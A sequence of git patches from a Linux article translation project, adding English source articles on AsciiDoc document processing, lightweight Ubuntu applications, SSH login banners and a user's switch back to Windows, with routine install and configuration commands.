count the number of times I stopped my writing just to fix some minor styling issue -- and having lost my inspiration when I came back to the text. If you disagree or have a different experience, don't hesitate to contradict me using the comment section below! + +Anyway, my second argument will be less subject to personal interpretation: documents based on text formats are highly interoperable. Not only you can edit them with any text editor on any platform, but you can easily manage text revisions with a tool such as [git][13] or [SVN][14], or automate text modification using common tools such as [sed][15], [AWK][16], [Perl][17] and so on. To give you a concrete example, when using a text-based format like AsciiDoc, I only need one command to produce highly personalized mailing from a master document, whereas the same job using a WYSIWYG editor would have required a clever use of "fields" and going through several wizard screens. + +### What is AsciiDoc? + +Strictly speaking, AsciiDoc is a file format. It defines syntactic constructs that will help a processor to understand the semantics of the various parts of your text. Usually in order to produce a nicely formatted output. + +Even if that definition could seem abstract, this is something simple: some keywords or characters in your document have a special meaning that will change the rendering of the document. This is the exact same concept as the tags in HTML. But a key difference with AsciiDoc is the property of the source document to remain easily human readable. + +Check [our GitHub repository][18] to compare how the same output can be produced using few common text files format: (coffee manpage idea courtesy of ) + + * `coffee.man` uses the venerable troff processor (based on the 1964 [RUNOFF][19] program). It's mostly used today to write [man pages][20]. You can try it after having downloaded the `coffee.*` files by typing `man ./coffee.man` at your command prompt. + * `coffee.tex` uses the LaTeX syntax (1985) to achieve mostly the same result but for a PDF output. LaTeX is a typesetting program especially well suited for scientific publications because of its ability to nicely format mathematical formulae and tables. You can produce the PDF from the LaTeX source using `pdflatex coffee.tex` + * `coffee.html` is using the HTML format (1991) to describe the page. You can directly open that file with your favorite web browser to see the result. + * `coffee.adoc`, finally, is using the AsciiDoc syntax (2002). You can produce both HTML and PDF from that file: + + +``` +asciidoc coffee.adoc # HTML output +a2x --format pdf ./coffee.adoc # PDF output (dblatex) +a2x --fop --format pdf ./coffee.adoc # PDF output (Apache FOP) +``` + +Now you've seen the result, open those four files using your favorite [text editor][21] (nano, vim, SublimeText, gedit, Atom, … ) and compare the sources: there are great chances you will agree the AsciiDoc sources are easier to read -- and probably to write too. + + +![Who is who? Could you guess which of these example files is written using AsciiDoc?][22] + +### How to install AsciiDoc in Linux? + +AsciiDoc is relatively complex to install because of the many dependencies. I mean complex if you want to install it from sources. For most of us, using our package manager is probably the best way: +``` +apt-get install asciidoc fop +``` + +or the following command: +``` +yum install acsiidoc fop +``` + +(fop is only required if you need the [Apache FOP][23] backend for PDF generation -- this is the PDF backend I use myself) + +More details about the installation can be found on [the official AsciiDoc website][24]. For now, all you need now is a little bit of patience, since, at least on my minimal Debian system, installing AsciiDoc require 360MB to be downloaded (mostly because of the LaTeX dependency). Which, depending on your Internet bandwidth, may give you plenty of time to read the rest of this article. + +### AsciiDoc Tutorial: How to write in AsciiDoc? + + +![AsciiDoc tutorial for Linux][25] + +I said it several times, AsciiDoc is a human-readable text file format. So, you can write your documents using the text editor of your choice. There are even dedicated text editors. But I will not talk about them here-- simply because I don't use them. But if are using one of them, don't hesitate to share your feedback using the comment section at the end of this article. + +I do not intend to create yet another AsciiDoc syntax tutorial here: there are plenty of them already available on the web. So I will only mention the very basic syntactic constructs you will use in virtually any document. From the simple "coffee" command example quoted above, you may see: + + * **titles** in AsciiDoc are identified by underlying them with `===` or `---` (depending on the title level), + * **bold** character spans are written between starts, + * and **italics** between underscores. + + + +Those are pretty common convention probably dating back to the pre-HTML email era. In addition, you may need two other common constructs, not illustrated in my previous example: **hyperlinks** and **images** inclusion, whose syntax is pretty self-explanatory. +``` +// HyperText links +link:http://dashing-kazoo.flywheelsites.com[ItsFOSS Linux Blog] + +// Inline Images +image:https://itsfoss.com/wp-content/uploads/2017/06/itsfoss-text-logo.png[ItsFOSS Text Logo] + +// Block Images +image::https://itsfoss.com/wp-content/uploads/2017/06/itsfoss-text-logo.png[ItsFOSS Text Logo] +``` + +But the AsciiDoc syntax is much richer than that. If you want more, I can point you to that nice AsciiDoc cheatsheet: + +### How to render the final output? + +I will assume here you have already written some text following the AsciiDoc format. If this is not the case, you can download [here][26] some example files copied straight out of the AsciiDoc documentation: +``` +# Download the AsciiDoc User Guide source document +BASE='https://raw.githubusercontent.com/itsfoss/asciidoc-intro/master' +wget "${BASE}"/{asciidoc.txt,customers.csv} +``` + +Since AsciiDoc is human-readable, you can send the AsciiDoc source text directly to someone by email, and the recipient will be able to read that message without further ado. But, you may want to provide some more nicely formatted output. For example as HTML for web publication (just like I've done it for this article). Or as PDF for print or display usage. + +In all cases, you need a processor. In fact, under the hood, you will need several processors. Because your AsciiDoc document will be transformed into various intermediate formats before producing the final output. Since several tools are used, the output of one being the input of the next one, we sometimes speak of a toolchain. + +Even if I explain some inner working details here, you have to understand most of that will be hidden from you. Unless maybe when you initially have to install the tools-- or if you want to fine-tune some steps of the process. + +#### In practice? + +For HTML output, you only need the `asciidoc` tool. For more complicated toolchains, I encourage you to use the `a2x` tool (part of the AsciiDoc distribution) that will trigger the necessary processors in order: +``` +# All examples are based on the AsciiDoc User Guide source document + +# HTML output +asciidoc asciidoc.txt +firefox asciidoc.html + +# XHTML output +a2x --format=xhtml asciidoc.txt + +# PDF output (LaTeX processor) +a2x --format=pdf asciidoc.txt + +# PDF output (FOP processor) +a2x --fop --format=pdf asciidoc.txt +``` + +Even if it can directly produce an HTML output, the core functionality of the `asciidoc` tool remains to transform the AsciiDoc document to the intermediate [DocBook][27] format. DocBook is a XML-based format commonly used for (but not limited to) technical documentation publishing. DocBook is a semantic format. That means it describes your document content. But not its presentation. So formatting will be the next step of the transformation. For that, whatever is the output format, the DocBook intermediate document is processed through an [XSLT][28] processor to produce either directly the output (e.g. XHTML), or another intermediate format. + +This is the case when you generate a PDF document where the DocBook document will be (at your will) converted either as a LaTeX intermediate representation or as [XSL-FO][29] (a XML-based language for page description). Finally, a dedicated tool will convert that representation to PDF. + +The extra steps for PDF generations are notably justified by the fact the toolchain has to handle pagination for the PDF output. Something this is not necessary for a "stream" format like HTML. + +#### dblatex or fop? + +Since there are two PDF backends, the usual question is "Which is the best?" Something I can't answer for you. + +Both processors have [pros and cons][30]. And ultimately, the choice will be a compromise between your needs and your tastes. So I encourage you to take the time to try both of them before choosing the backend you will use. If you follow the LaTeX path, [dblatex][31] will be the backend used to produce the PDF. Whereas it will be [Apache FOP][32] if you prefer using the XSL-FO intermediate format. So don't forget to take a look at the documentation of these tools to see how easy it will be to customize the output to your needs. Unless of course if you are satisfied with the default output! + +### How to customize the output of AsciiDoc? + +#### AsciiDoc to HTML + +Out of the box, AsciiDoc produces pretty nice documents. But sooner or later you will what to customize their appearance. + +The exact changes will depend on the backend you use. For the HTML output, most changes can be done by changing the [CSS][33] stylesheet associated with the document. + +For example, let's say I want to display all section headings in red, I could create the following `custom.css` file: +``` +h2 { + color: red; +} +``` + +And process the document using the slightly modified command: +``` +# Set the 'stylesheet' attribute to +# the absolute path to our custom CSS file +asciidoc -a stylesheet=$PWD/custom.css asciidoc.txt +``` + +You can also make changes at a finer level by attaching a role attribute to an element. This will translate into a class attribute in the generated HTML. + +For example, try to modify our test document to add the role attribute to the first paragraph of the text: +``` +[role="summary"] +AsciiDoc is a text document format .... +``` + +Then add the following rule to the `custom.css` file: +``` +.summary { + font-style: italic; +} +``` + +Re-generate the document: +``` +asciidoc -a stylesheet=$PWD/custom.css asciidoc.txt +``` + + +![AsciiDoc HTML output with custom CSS to display the first paragraph in italics and section headings in color][34] + + 1. et voila: the first paragraph is now displayed in italic. With a little bit of creativity, some patience and a couple of CSS tutorials, you should be able to customize your document at your wills. + + + +#### AsciiDoc to PDF + +Customizing the PDF output is somewhat more complex. Not from the author's perspective since the source text will remain identical. Eventually using the same role attribute as above to identify the parts that need a special treatment. + +But you can no longer use CSS to define the formatting for PDF output. For the most common settings, there are parameters you can set from the command line. Some parameters can be used both with the dblatex and the fop backends, others are specific to each backend. + +For the list of dblatex supported parameters, see + +For the list of DocBook XSL parameters, see + +Since margin adjustment is a pretty common requirement, you may also want to take a look at that: + +If the parameter names are somewhat consistent between the two backends, the command-line arguments used to pass those values to the backends differ between dblatex and fop. So, double check first your syntax if apparently, this isn't working. But to be honest, while writing this article I wasn't able to make the `body.font.family` parameter work with the dblatex backend. Since I usually use fop, maybe did I miss something? If you have more clues about that, I will be more than happy to read your suggestions in the comment section at the end of this article! + +Worth mentioning using non-standard fonts-- even with fop-require some extra work. But it's pretty well documented on the Apache website: +``` +# XSL-FO/FOP +a2x -v --format pdf \ + --fop \ + --xsltproc-opts='--stringparam page.margin.inner 10cm' \ + --xsltproc-opts='--stringparam body.font.family Helvetica' \ + --xsltproc-opts='--stringparam body.font.size 8pt' \ + asciidoc.txt + +# dblatex +# (body.font.family _should_ work, but, apparently, it isn't ?!?) +a2x -v --format pdf \ + --dblatex-opts='--param page.margin.inner=10cm' \ + --dblatex-opts='--stringparam body.font.family Helvetica' \ + asciidoc.txt +``` + +#### Fine-grained setting for PDF generation + +Global parameters are nice if you just need to adjust some pre-defined settings. But if you want to fine-tune the document (or completely change the layout) you will need some extra efforts. + +At the core of the DocBook processing there is [XSLT][28]. XSLT is a computer language, expressed in XML notation, that allows to write arbitrary transformation from an XML document to … something else. XML or not. + +For example, you will need to extend or modify the [DocBook XSL stylesheet][35] to produce the XSL-FO code for the new styles you may want. And if you use the dblatex backend, this may require modifying the corresponding DocBook-to-LaTeX XSLT stylesheet. In that latter case you may also need to use a custom LaTeX package. But I will not focus on that since dblatex is not the backend I use myself. I can only point you to the [official documentation][36] if you want to know more. But once again, if you're familiar with that, please share your tips and tricks in the comment section! + +Even while focusing only on fop, I don't really have the room here to detail the entire procedure. So, I will just show you the changes you could use to obtain a similar result as the one obtained with few CSS lines in HTML output above. That is: section titles in red and a summary paragraph in italics. + +The trick I use here is to create a new XSLT stylesheet, importing the original DocBook stylesheet, but overriding the attribute sets or template for the elements we want to change: +``` + + + + + + + + + #FF0000 + + + + + + + + + + + + + + italic + + + + + + + +``` + +Then, you have to request `a2x` to use that custom XSL stylesheet to produce the output rather than the default one using the `--xsl-file` option: +``` +a2x -v --format pdf \ + --fop \ + --xsl-file=./custom.xsl \ + asciidoc.txt +``` + +![AsciiDoc PDF output generated from Apache FOP using a custom XSLT to display the first paragraph in italics and section headings in color][37] + +With a little bit of familiarity with XSLT, the hints given here and some queries on your favorite search engine, I think you should be able to start customizing the XSL-FO output. + +But I will not lie, some apparently simple changes in the document output may require you to spend quite some times searching through the DocBook XML and XSL-FO manuals, examining the stylesheets sources and performing a couple of tests before you finally achieve what you want. + +### My opinion + +Writing documents using a text format has tremendous advantages. And if you need to publish to HTML, there is not much reason for not using AsciiDoc. The syntax is clean and neat, processing is simple and changing the presentation if needed, mostly require easy to acquire CSS skills. + +And even if you don't use the HTML output directly, HTML can be used as an interchange format with many WYSIWYG applications today. As an example, this is was I've done here: I copied the HTML output of this article into the WordPress edition area, thus conserving all formatting, without having to type anything directly into WordPress. + +If you need to publish to PDF-- the advantages remain the same for the writer. Things will be certainly harsher if you need to change the default layout in depth though. In a corporate environment, that probably means hiring a document designed skilled with XSLT to produce the set of stylesheets that will suit your branding or technical requirements-- or for someone in the team to acquire those skills. But once done it will be a pleasure to write text with AsciiDoc. And seeing those writings being automatically converted to beautiful HTML pages or PDF documents! + +Finally, if you find AsciiDoc either too simplistic or too complex, you may take a look at some other file formats with similar goals: [Markdown][38], [Textile][39], [reStructuredText][40] or [AsciiDoctor][41] to name few. Even if based on concepts dating back to the early days of computing, the human-readable text format ecosystem is pretty rich. Probably richer it was only 20 years ago. As a proof, many modern [static web site generators][42] are based on them. Unfortunately, this is out of the scope for this article. So, let us know if you want to hear more about that! + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/asciidoc-guide/ + +作者:[Sylvain Leroux][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/sylvain/ +[1]:https://www.computerhope.com/jargon/w/wordssor.htm +[2]:https://en.wikipedia.org/wiki/WYSIWYG +[3]:https://en.wikipedia.org/wiki/Troff +[4]:https://en.wikipedia.org/wiki/HTML +[5]:https://en.wikipedia.org/wiki/Rich_Text_Format +[6]:https://en.wikipedia.org/wiki/TeX +[7]:https://en.wikipedia.org/wiki/LaTeX +[8]:https://en.wikipedia.org/wiki/XML +[9]:https://en.wikipedia.org/wiki/AsciiDoc +[11]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09//epistole-manual-command-example-version-soft-luc-barthelet-1985.png +[12]:https://wiki.openoffice.org/wiki/Documentation/OOo3_User_Guides/Getting_Started/Templates_and_Styles +[13]:https://en.wikipedia.org/wiki/Git +[14]:https://en.wikipedia.org/wiki/Apache_Subversion +[15]:https://en.wikipedia.org/wiki/Sed +[16]:https://en.wikipedia.org/wiki/AWK +[17]:https://en.wikipedia.org/wiki/Perl +[18]:https://github.com/itsfoss/asciidoc-intro/tree/master/coffee +[19]:https://en.wikipedia.org/wiki/TYPSET_and_RUNOFF +[20]:https://en.wikipedia.org/wiki/Man_page +[21]:https://en.wikipedia.org/wiki/Text_editor +[22]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09//troff-latex-html-asciidoc-compare-source-code.png +[23]:https://en.wikipedia.org/wiki/Formatting_Objects_Processor +[24]:http://www.methods.co.nz/asciidoc/INSTALL.html +[25]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/10/asciidoc-tutorial-linux.jpg +[26]:https://raw.githubusercontent.com/itsfoss/asciidoc-intro/master +[27]:https://en.wikipedia.org/wiki/DocBook +[28]:https://en.wikipedia.org/wiki/XSLT +[29]:https://en.wikipedia.org/wiki/XSL_Formatting_Objects +[30]:http://www.methods.co.nz/asciidoc/userguide.html#_pdf_generation +[31]:http://dblatex.sourceforge.net/ +[32]:https://xmlgraphics.apache.org/fop/ +[33]:https://en.wikipedia.org/wiki/Cascading_Style_Sheets +[34]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09//asciidoc-html-output-custom-role-italic-paragraph-color-heading.png +[35]:http://www.sagehill.net/docbookxsl/ +[36]:http://dblatex.sourceforge.net/doc/manual/sec-custom.html +[37]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09//asciidoc-fop-output-custom-role-italic-paragraph-color-heading.png +[38]:https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet +[39]:https://txstyle.org/ +[40]:http://docutils.sourceforge.net/docs/user/rst/quickstart.html +[41]:http://asciidoctor.org/ +[42]:https://www.smashingmagazine.com/2015/11/modern-static-website-generators-next-big-thing/ From 92cb1935711e2a6718ce677d61258cf12a8c9746 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:40:44 +0800 Subject: [PATCH 0897/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=209=20Lightweight?= =?UTF-8?q?=20Linux=20Applications=20to=20Speed=20Up=20Your=20System?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ux Applications to Speed Up Your System.md | 213 ++++++++++++++++++ 1 file changed, 213 insertions(+) create mode 100644 sources/tech/20170310 9 Lightweight Linux Applications to Speed Up Your System.md diff --git a/sources/tech/20170310 9 Lightweight Linux Applications to Speed Up Your System.md b/sources/tech/20170310 9 Lightweight Linux Applications to Speed Up Your System.md new file mode 100644 index 0000000000..5d5696cf6c --- /dev/null +++ b/sources/tech/20170310 9 Lightweight Linux Applications to Speed Up Your System.md @@ -0,0 +1,213 @@ +9 Lightweight Linux Applications to Speed Up Your System +====== +**Brief:** One of the many ways to [speed up Ubuntu][1] system is to use lightweight alternatives of the popular applications. We have already seen [must have Linux application][2] earlier. we'll see the lightweight alternative applications for Ubuntu and other Linux distributions. + +![Use these Lightweight alternative applications in Ubuntu Linux][4] + +## 9 Lightweight alternatives of popular Linux applications + +Is your Linux system slow? Are the applications taking a long time to open? The best option you have is to use a [light Linux distro][5]. But it's not always possible to reinstall an operating system, is it? + +So if you want to stick to your present Linux distribution, but want improved performance, you should use lightweight alternatives of the applications you are using. Here, I'm going to put together a small list of lightweight alternatives to various Linux applications. + +Since I am using Ubuntu, I have provided installation instructions for Ubuntu-based Linux distributions. But these applications will work on almost all other Linux distribution. You just have to find a way to install these lightweight Linux software in your distro. + +### 1. Midori: Web Browser + +Midori is one of the most lightweight web browsers that have reasonable compatibility with the modern web. It is open source and uses the same rendering engine that Google Chrome was initially built on -- WebKit. It is super fast and minimal yet highly customizable. + +![Midori Browser][6] + +It has plenty of extensions and options to tinker with. So if you are a power user, it's a great choice for you too. If you face any problems browsing round the web, check the [Frequently Asked Question][7] section of their website -- it contains the common problems you might face along with their solution. + +[Midori][8] + +#### Installing Midori on Ubuntu based distributions + +Midori is available on Ubuntu via the official repository. Just run the following commands for installing it: +``` + sudo apt install midori +``` + +### 2. Trojita: email client + +Trojita is an open source robust IMAP e-mail client. It is fast and resource efficient. I can certainly call it one of the [best email clients for Linux][9]. If you can live with only IMAP support on your e-mail client, you might not want to look any further. + +![Trojitá][10] + +Trojita uses various techniques -- on-demand e-mail loading, offline caching, bandwidth-saving mode etc. -- for achieving its impressive performance. + +[Trojita][11] + +#### Installing Trojita on Ubuntu based distributions + +Trojita currently doesn't have an official PPA for Ubuntu. But that shouldn't be a problem. You can install it quite easily using the following commands: +``` +sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/jkt-gentoo:/trojita/xUbuntu_16.04/ /' > /etc/apt/sources.list.d/trojita.list" +wget http://download.opensuse.org/repositories/home:jkt-gentoo:trojita/xUbuntu_16.04/Release.key +sudo apt-key add - < Release.key +sudo apt update +sudo apt install trojita +``` + +### 3. GDebi: Package Installer + +Sometimes you need to quickly install DEB packages. Ubuntu Software Center is a resource-heavy application and using it just for installing .deb files is not wise. + +Gdebi is certainly a nifty tool for the same purpose, just with a minimal graphical interface. + +![GDebi][12] + +GDebi is totally lightweight and does its job flawlessly. You should even [make Gdebi the default installer for DEB files][13]. + +#### Installing GDebi on Ubuntu based distributions + +You can install GDebi on Ubuntu with this simple one-liner: +``` +sudo apt install gdebi +``` + +### 4. App Grid: Software Center + +If you use software center frequently for searching, installing and managing applications on Ubuntu, App Grid is a must have application. It is the most visually appealing and yet fast alternative to the default Ubuntu Software Center. + +![App Grid][14] + +App Grid supports ratings, reviews and screenshots for applications. + +[App Grid][15] + +#### Installing App Grid on Ubuntu based distributions + +App Grid has its official PPA for Ubuntu. Use the following commands for installing App Grid: +``` +sudo add-apt-repository ppa:appgrid/stable +sudo apt update +sudo apt install appgrid +``` + +### 5. Yarock: Music Player + +Yarock is an elegant music player with a modern and minimal user interface. It is lightweight in design and yet it has a comprehensive list of advanced features. + +![Yarock][16] + +The main features of Yarock include multiple music collections, rating, smart playlist, multiple back-end option, desktop notification, scrobbling, context fetching etc. + +[Yarock][17] + +#### Installing Yarock on Ubuntu based distributions + +You will have to install Yarock on Ubuntu via PPA using the following commands: +``` +sudo add-apt-repository ppa:nilarimogard/webupd8 +sudo apt update +sudo apt install yarock +``` + +### 6. VLC: Video Player + +Who doesn't need a video player? And who has never heard about VLC? It doesn't really need any introduction. + +![VLC][18] + +VLC is all you need to play various media files on Ubuntu and it is quite lightweight too. It works flawlessly on even on very old PCs. + +[VLC][19] + +#### Installing VLC on Ubuntu based distributions + +VLC has official PPA for Ubuntu. Enter the following commands for installing it: +``` +sudo apt install vlc +``` + +### 7. PCManFM: File Manager + +PCManFM is the standard file manager from LXDE. As with the other applications from LXDE, this one too is lightweight. If you are looking for a lighter alternative for your file manager, try this one. + +![PCManFM][20] + +Although coming from LXDE, PCManFM works with other desktop environments just as well. + +#### Installing PCManFM on Ubuntu based distributions + +Installing PCManFM on Ubuntu will just take one simple command: +``` +sudo apt install pcmanfm +``` + +### 8. Mousepad: Text Editor + +Nothing can beat command-line text editors like - nano, vim etc. in terms of being lightweight. But if you want a graphical interface, here you go -- Mousepad is a minimal text editor. It's extremely lightweight and blazing fast. It comes with a simple customizable user interface with multiple themes. + +![Mousepad][21] + +Mousepad supports syntax highlighting. So, you can also use it as a basic code editor. + +#### Installing Mousepad on Ubuntu based distributions + +For installing Mousepad use the following command: +``` +sudo apt install mousepad +``` + +### 9. GNOME Office: Office Suite + +Many of us need to use office applications quite often. Generally, most of the office applications are bulky in size and resource hungry. Gnome Office is quite lightweight in that respect. Gnome Office is technically not a complete office suite. It's composed of different standalone applications and among them, **AbiWord** & **Gnumeric** stands out. + +**AbiWord** is the word processor. It is lightweight and a lot faster than other alternatives. But that came to be at a cost -- you might miss some features like macros, grammar checking etc. It's not perfect but it works. + +![AbiWord][22] + +**Gnumeric** is the spreadsheet editor. Just like AbiWord, Gnumeric is also very fast and it provides accurate calculations. If you are looking for a simple and lightweight spreadsheet editor, Gnumeric has got you covered. + +![Gnumeric][23] + +There are some other applications listed under Gnome Office. You can find them in the official page. + +[Gnome Office][24] + +#### Installing AbiWord & Gnumeric on Ubuntu based distributions + +For installing AbiWord & Gnumeric, simply enter the following command in your terminal: +``` +sudo apt install abiword gnumeric +``` + +That's all for today. Would you like to add some other **lightweight Linux applications** to this list? Do let us know! + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/lightweight-alternative-applications-ubuntu/ + +作者:[Munif Tanjim][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/munif/ +[1]:https://itsfoss.com/speed-up-ubuntu-1310/ +[2]:https://itsfoss.com/essential-linux-applications/ +[4]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/Lightweight-alternative-applications-for-Linux-800x450.jpg +[5]:https://itsfoss.com/lightweight-linux-beginners/ +[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/Midori-800x497.png +[7]:http://midori-browser.org/faqs/ +[8]:http://midori-browser.org/ +[9]:https://itsfoss.com/best-email-clients-linux/ +[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/Trojit%C3%A1-800x608.png +[11]:http://trojita.flaska.net/ +[12]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/GDebi.png +[13]:https://itsfoss.com/gdebi-default-ubuntu-software-center/ +[14]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/AppGrid-800x553.png +[15]:http://www.appgrid.org/ +[16]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/Yarock-800x529.png +[17]:https://seb-apps.github.io/yarock/ +[18]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/VLC-800x526.png +[19]:http://www.videolan.org/index.html +[20]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/PCManFM.png +[21]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/Mousepad.png +[22]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/AbiWord-800x626.png +[23]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/Gnumeric-800x470.png +[24]:https://gnome.org/gnome-office/ From ac5c3b75aaed930d40dae2566ab2fb9b1cae9206 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:47:06 +0800 Subject: [PATCH 0898/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20conf?= =?UTF-8?q?igure=20login=20banners=20in=20Linux=20(RedHat,=20Ubuntu,=20Cen?= =?UTF-8?q?tOS,=20Fedora)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Linux (RedHat, Ubuntu, CentOS, Fedora).md | 95 +++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 sources/tech/20171110 How to configure login banners in Linux (RedHat, Ubuntu, CentOS, Fedora).md diff --git a/sources/tech/20171110 How to configure login banners in Linux (RedHat, Ubuntu, CentOS, Fedora).md b/sources/tech/20171110 How to configure login banners in Linux (RedHat, Ubuntu, CentOS, Fedora).md new file mode 100644 index 0000000000..485be46ab7 --- /dev/null +++ b/sources/tech/20171110 How to configure login banners in Linux (RedHat, Ubuntu, CentOS, Fedora).md @@ -0,0 +1,95 @@ +How to configure login banners in Linux (RedHat, Ubuntu, CentOS, Fedora) +====== +Learn how to create login banners in Linux to display different warning or information messages to user who is about to log in or after he logs in. + +![Login banners in Linux][1] + +Whenever you login to some production systems of firm, you get to see some login messages, warnings or info about server you are about to login or already logged in like below. Those are the login banners. + +![Login welcome messages in Linux][2] + +In this article we will walk you through how to configure them. + +There are two types of banners you can configure. + + 1. Banner message to display before user log in (configure in file of your choice eg. `/etc/login.warn`) + 2. Banner message to display after user successfully logged in (configure in `/etc/motd`) + + + +### How to display message when user connects to system before login + +This message will be displayed to user when he connects to server and before he logged in. Means when he enter the username, this message will be displayed before password prompt. + +You can use any filename and enter your message within. Here we used `/etc/login.warn` file and put our messages inside. + +``` +# cat /etc/login.warn + !!!! Welcome to KernelTalks test server !!!! +This server is meant for testing Linux commands and tools. If you are +not associated with kerneltalks.com and not authorized please dis-connect +immediately. +``` + +Now, you need to supply this file and path to `sshd` daemon so that it can fetch this banner for each user login request. For that open `/etc/sshd/sshd_config` file and search for line `#Banner none` + +Here you have to edit file and write your filename and remove hash mark. It should look like : `Banner /etc/login.warn` + +Save file and restart `sshd` daemon. To avoid disconnecting existing connected users, use HUP signal to restart sshd. + +``` +oot@kerneltalks # ps -ef |grep -i sshd +root 14255 1 0 18:42 ? 00:00:00 /usr/sbin/sshd -D +root 19074 14255 0 18:46 ? 00:00:00 sshd: ec2-user [priv] +root 19177 19127 0 18:54 pts/0 00:00:00 grep -i sshd + +root@kerneltalks # kill -HUP 14255 +``` + +Thats it! Open new session and try login. You will be greeted with the message you configured in above steps . + +![Login banner in Linux][3] + +You can see message is displayed before user enter his password and log in to system. + +### How to display message after user logs in + +Message user sees after he logs into system successfully is **M** essage **O** f **T** he **D** ay & is controlled by `/etc/motd` file. Edit this file and enter message you want to greet user with once he successfully logged in. + +``` +root@kerneltalks # cat /etc/motd + W E L C O M E +Welcome to the testing environment of kerneltalks. +Feel free to use this system for testing your Linux +skills. In case of any issues reach out to admin at +info@kerneltalks.com. Thank you. + +``` + +You dont need to restart `sshd` daemon to take this change effect. As soon as you save the file, its content will be read and displayed by sshd daemon from very next login request it serves. + +![motd in linux][4] + +You can see in above screenshot : Yellow box is MOTD controlled by `/etc/motd` and green box is what we saw earlier login banner. + +You can use tools like [cowsay][5], [banner][6], [figlet][7], [lolcat ][8]to create fancy, eye-catching messages to display at login. This method works on almost all Linux distros like RedHat, CentOs, Ubuntu, Fedora etc. + +-------------------------------------------------------------------------------- + +via: https://kerneltalks.com/tips-tricks/how-to-configure-login-banners-in-linux/ + +作者:[kerneltalks][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://kerneltalks.com +[1]:https://c3.kerneltalks.com/wp-content/uploads/2017/11/login-banner-message-in-linux.png +[2]:https://c3.kerneltalks.com/wp-content/uploads/2017/11/Login-message-in-linux.png +[3]:https://c1.kerneltalks.com/wp-content/uploads/2017/11/login-banner.png +[4]:https://c3.kerneltalks.com/wp-content/uploads/2017/11/motd-message-in-linux.png +[5]:https://kerneltalks.com/tips-tricks/cowsay-fun-in-linux-terminal/ +[6]:https://kerneltalks.com/howto/create-nice-text-banner-hpux/ +[7]:https://kerneltalks.com/tips-tricks/create-beautiful-ascii-text-banners-linux/ +[8]:https://kerneltalks.com/linux/lolcat-tool-to-rainbow-color-linux-terminal/ From 40c01c4583314970f640749e95e8c6574b2f472d Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:49:51 +0800 Subject: [PATCH 0899/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20My=20Adventure?= =?UTF-8?q?=20Migrating=20Back=20To=20Windows?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... My Adventure Migrating Back To Windows.md | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 sources/tech/20171113 My Adventure Migrating Back To Windows.md diff --git a/sources/tech/20171113 My Adventure Migrating Back To Windows.md b/sources/tech/20171113 My Adventure Migrating Back To Windows.md new file mode 100644 index 0000000000..9356dc8204 --- /dev/null +++ b/sources/tech/20171113 My Adventure Migrating Back To Windows.md @@ -0,0 +1,129 @@ +My Adventure Migrating Back To Windows +====== +I have had linux as my primary OS for about a decade now, and primarily use Ubuntu. But with the latest release I have decided to migrate back to an OS I generally dislike, Windows 10. + +![Ubuntu On Windows][1] +I have always been a fan of Linux, with my two favorite distributions being debian and ubuntu. Now as a server OS, linus is perfect and unquestionable, but there has always been problems of varing degree on the desktop. + +The most recent set of problems I had made me realise that I dont need to use linux as my desktop os to still be a fan so based on my experience fresh installing Ubutnu 17.10 I have decided to move back to windows. + +### What Caused Me to Switch Back? + +The problem was, when 17.10 came out I did a fresh install like usual but faced some really strange an new issues. + + * Dell D3100 Dock no longer worked (Including the Work Arounds) + * Ubuntu kept Freezing (Randomly) + * Double Clicking Icons on the desktop did nothing + * Using the HUD to search for programs such as "tweaks" would try installing MATE versions. + * The GUI felt worse than standard GNOME + + + +Now I did considor going back to using 16.04 or to another distro. But I feel Unity 7 was the most polished desktop environment, and the only other which is as polished and stable is windows 10. + +In addition to the above, there were also 